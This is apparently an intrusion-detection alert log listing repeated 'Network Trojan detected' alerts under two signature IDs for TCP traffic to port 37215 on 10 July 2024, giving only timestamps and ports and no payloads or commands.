                  Timestamp:07/10/24-08:26:34.201390
                  SID:2835222
                  Source Port:58156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.904429
                  SID:2829579
                  Source Port:36666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.497037
                  SID:2829579
                  Source Port:46306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.334511
                  SID:2835222
                  Source Port:33594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574269
                  SID:2829579
                  Source Port:47722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659473
                  SID:2835222
                  Source Port:58002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815685
                  SID:2835222
                  Source Port:32872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000854
                  SID:2835222
                  Source Port:53372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641843
                  SID:2835222
                  Source Port:55028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369719
                  SID:2835222
                  Source Port:58872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.341408
                  SID:2829579
                  Source Port:55642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.651509
                  SID:2835222
                  Source Port:48496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.687075
                  SID:2829579
                  Source Port:35206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2835222
                  Source Port:52748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2835222
                  Source Port:47474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.443386
                  SID:2829579
                  Source Port:36336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216677
                  SID:2835222
                  Source Port:60220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.587984
                  SID:2829579
                  Source Port:53226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.638682
                  SID:2835222
                  Source Port:52532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545820
                  SID:2829579
                  Source Port:41804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971470
                  SID:2835222
                  Source Port:59956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.185610
                  SID:2829579
                  Source Port:41418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202550
                  SID:2829579
                  Source Port:57876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.915899
                  SID:2835222
                  Source Port:43016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2829579
                  Source Port:48948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.239106
                  SID:2835222
                  Source Port:59828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239596
                  SID:2829579
                  Source Port:43738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.119507
                  SID:2829579
                  Source Port:55844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.761946
                  SID:2829579
                  Source Port:53924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.514897
                  SID:2829579
                  Source Port:45656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.160309
                  SID:2835222
                  Source Port:39208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2829579
                  Source Port:58112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.898408
                  SID:2829579
                  Source Port:40806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842120
                  SID:2829579
                  Source Port:37878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.906092
                  SID:2829579
                  Source Port:47026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771474
                  SID:2835222
                  Source Port:58522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.110182
                  SID:2835222
                  Source Port:46178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488786
                  SID:2835222
                  Source Port:53978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260349
                  SID:2835222
                  Source Port:57740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.337218
                  SID:2835222
                  Source Port:33226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012931
                  SID:2829579
                  Source Port:39922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121517
                  SID:2829579
                  Source Port:47652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.986988
                  SID:2835222
                  Source Port:56350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.312425
                  SID:2835222
                  Source Port:38712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.778762
                  SID:2835222
                  Source Port:56638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.210866
                  SID:2835222
                  Source Port:58640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.932186
                  SID:2829579
                  Source Port:41866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.875602
                  SID:2829579
                  Source Port:46926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640605
                  SID:2829579
                  Source Port:38296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824276
                  SID:2835222
                  Source Port:60084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.016670
                  SID:2829579
                  Source Port:47346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551347
                  SID:2829579
                  Source Port:42438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.261102
                  SID:2829579
                  Source Port:49844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.289200
                  SID:2835222
                  Source Port:42908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.528715
                  SID:2835222
                  Source Port:46382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591213
                  SID:2835222
                  Source Port:50600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.570242
                  SID:2829579
                  Source Port:40326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.856531
                  SID:2835222
                  Source Port:44198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.880668
                  SID:2829579
                  Source Port:38910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.718620
                  SID:2835222
                  Source Port:42466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.625884
                  SID:2835222
                  Source Port:48418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.016276
                  SID:2829579
                  Source Port:46680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147425
                  SID:2835222
                  Source Port:42984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.721683
                  SID:2835222
                  Source Port:46032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564060
                  SID:2829579
                  Source Port:35504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384932
                  SID:2829579
                  Source Port:49322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247201
                  SID:2829579
                  Source Port:54928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494358
                  SID:2829579
                  Source Port:56132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.145999
                  SID:2829579
                  Source Port:33890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.356000
                  SID:2829579
                  Source Port:50984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.768193
                  SID:2835222
                  Source Port:39364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492137
                  SID:2829579
                  Source Port:35922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.193272
                  SID:2835222
                  Source Port:47960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444782
                  SID:2829579
                  Source Port:39886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510690
                  SID:2829579
                  Source Port:47364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538124
                  SID:2835222
                  Source Port:51776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271006
                  SID:2835222
                  Source Port:59520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.844473
                  SID:2835222
                  Source Port:54438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.866134
                  SID:2835222
                  Source Port:39514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.878882
                  SID:2829579
                  Source Port:41564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.526946
                  SID:2835222
                  Source Port:46962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.574259
                  SID:2829579
                  Source Port:38332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.228026
                  SID:2829579
                  Source Port:51656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.669617
                  SID:2829579
                  Source Port:59690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.898002
                  SID:2835222
                  Source Port:57536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.630193
                  SID:2835222
                  Source Port:52068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121354
                  SID:2829579
                  Source Port:40652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.823206
                  SID:2835222
                  Source Port:42590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.377944
                  SID:2835222
                  Source Port:56312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.941322
                  SID:2835222
                  Source Port:44414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001692
                  SID:2829579
                  Source Port:56654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.626199
                  SID:2835222
                  Source Port:54428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.399018
                  SID:2835222
                  Source Port:48638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.753614
                  SID:2835222
                  Source Port:55036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.097626
                  SID:2829579
                  Source Port:48318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237897
                  SID:2835222
                  Source Port:57552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.831960
                  SID:2835222
                  Source Port:40732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.636753
                  SID:2829579
                  Source Port:50634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.567555
                  SID:2829579
                  Source Port:32818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854802
                  SID:2829579
                  Source Port:52872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237897
                  SID:2829579
                  Source Port:40124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.547774
                  SID:2829579
                  Source Port:56024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.903718
                  SID:2829579
                  Source Port:36930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.856531
                  SID:2835222
                  Source Port:42010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.208740
                  SID:2829579
                  Source Port:59524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.108447
                  SID:2829579
                  Source Port:47410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002898
                  SID:2829579
                  Source Port:54164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.797297
                  SID:2835222
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.740584
                  SID:2835222
                  Source Port:45560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230730
                  SID:2835222
                  Source Port:33492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.814365
                  SID:2835222
                  Source Port:54866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.979192
                  SID:2829579
                  Source Port:43304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.758860
                  SID:2829579
                  Source Port:50588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.330148
                  SID:2835222
                  Source Port:38962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.812623
                  SID:2835222
                  Source Port:58808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.116732
                  SID:2829579
                  Source Port:44320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.844415
                  SID:2835222
                  Source Port:33010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.351340
                  SID:2835222
                  Source Port:46310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505029
                  SID:2835222
                  Source Port:47210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.816754
                  SID:2835222
                  Source Port:55730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.755874
                  SID:2835222
                  Source Port:38348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2835222
                  Source Port:48244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.803828
                  SID:2829579
                  Source Port:40024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.638396
                  SID:2829579
                  Source Port:54904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.619989
                  SID:2835222
                  Source Port:33384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.870482
                  SID:2835222
                  Source Port:33092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.849437
                  SID:2829579
                  Source Port:40068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.189669
                  SID:2835222
                  Source Port:60262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.342964
                  SID:2829579
                  Source Port:45300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.484132
                  SID:2835222
                  Source Port:40190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.376308
                  SID:2829579
                  Source Port:34852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976996
                  SID:2829579
                  Source Port:33662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.018134
                  SID:2835222
                  Source Port:36252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.364210
                  SID:2829579
                  Source Port:33124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.148686
                  SID:2835222
                  Source Port:33626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.845245
                  SID:2829579
                  Source Port:47650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650012
                  SID:2829579
                  Source Port:38862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.830605
                  SID:2829579
                  Source Port:37210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.492179
                  SID:2835222
                  Source Port:47360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.525372
                  SID:2835222
                  Source Port:59838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997409
                  SID:2829579
                  Source Port:59664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.922168
                  SID:2835222
                  Source Port:40198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881415
                  SID:2829579
                  Source Port:45094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.000164
                  SID:2835222
                  Source Port:59130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.192281
                  SID:2829579
                  Source Port:38848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.494143
                  SID:2835222
                  Source Port:34212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155476
                  SID:2835222
                  Source Port:50808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981782
                  SID:2829579
                  Source Port:33598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564607
                  SID:2829579
                  Source Port:34792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.345692
                  SID:2829579
                  Source Port:59158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.029316
                  SID:2829579
                  Source Port:42386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559907
                  SID:2835222
                  Source Port:33708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.682663
                  SID:2829579
                  Source Port:34718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.316090
                  SID:2829579
                  Source Port:54258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.336820
                  SID:2829579
                  Source Port:37538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.696239
                  SID:2835222
                  Source Port:42618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.714672
                  SID:2835222
                  Source Port:48132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.965572
                  SID:2829579
                  Source Port:53192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.529956
                  SID:2829579
                  Source Port:50632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.563046
                  SID:2835222
                  Source Port:41286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.308630
                  SID:2829579
                  Source Port:51044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.191107
                  SID:2829579
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.279248
                  SID:2829579
                  Source Port:50214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869789
                  SID:2835222
                  Source Port:38388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.880092
                  SID:2829579
                  Source Port:36644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.418170
                  SID:2829579
                  Source Port:47166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.586352
                  SID:2829579
                  Source Port:59824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942038
                  SID:2829579
                  Source Port:46424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860875
                  SID:2835222
                  Source Port:46294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.791528
                  SID:2829579
                  Source Port:40792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.628503
                  SID:2829579
                  Source Port:39986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.014699
                  SID:2835222
                  Source Port:48350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.538305
                  SID:2829579
                  Source Port:51422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.441274
                  SID:2835222
                  Source Port:46184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159669
                  SID:2829579
                  Source Port:56236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.227132
                  SID:2829579
                  Source Port:53334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231077
                  SID:2829579
                  Source Port:57538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.064753
                  SID:2835222
                  Source Port:35134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.170023
                  SID:2835222
                  Source Port:52748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350610
                  SID:2835222
                  Source Port:39938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.660823
                  SID:2829579
                  Source Port:53180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.583934
                  SID:2829579
                  Source Port:46630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.165802
                  SID:2829579
                  Source Port:37698
                  Destination Port:37215
                  Protocol:TCP
